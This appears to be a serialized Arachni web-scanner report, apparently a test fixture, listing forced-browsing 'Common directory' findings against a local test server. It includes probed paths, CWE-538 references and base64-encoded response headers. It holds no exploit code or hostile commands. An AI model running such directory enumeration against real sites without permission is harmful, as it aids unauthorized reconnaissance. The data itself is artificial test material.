mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/crypto/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/crypto/ injected: crypto id: crypto elem: path remarks: {} method: '' response: crypto headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/classes/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/classes/ injected: classes id: classes elem: path remarks: :stuff: - Blah - Blah2 method: '' response: classes headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/cfdocs/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/cfdocs/ injected: cfdocs id: cfdocs elem: path remarks: {} method: '' response: cfdocs headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/cdrom/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/cdrom/ injected: cdrom id: cdrom elem: path remarks: {} method: '' response: cdrom headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/css/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/css/ injected: css id: css elem: path remarks: {} method: '' response: css headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/doc/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/doc/ injected: doc id: doc elem: path remarks: {} method: '' response: doc headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/download/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/download/ injected: download id: download elem: path remarks: {} method: '' response: download headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/downloads/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/downloads/ injected: downloads id: downloads elem: path remarks: {} method: '' response: downloads headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/docs/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/docs/ injected: docs id: docs elem: path remarks: {} method: '' response: docs headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/down/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/down/ injected: down id: down elem: path remarks: {} method: '' response: down headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/info/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/info/ injected: info id: info elem: path remarks: {} method: '' response: info headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/forum/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/forum/ injected: forum id: forum elem: path remarks: {} method: '' response: forum headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/source/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/source/ injected: source id: source elem: path remarks: {} method: '' response: source headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/inc/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/inc/ injected: inc id: inc elem: path remarks: {} method: '' response: inc headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/excel/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/excel/ injected: excel id: excel elem: path remarks: {} method: '' response: excel headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/etc/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/etc/ injected: etc id: etc elem: path remarks: {} method: '' response: etc headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
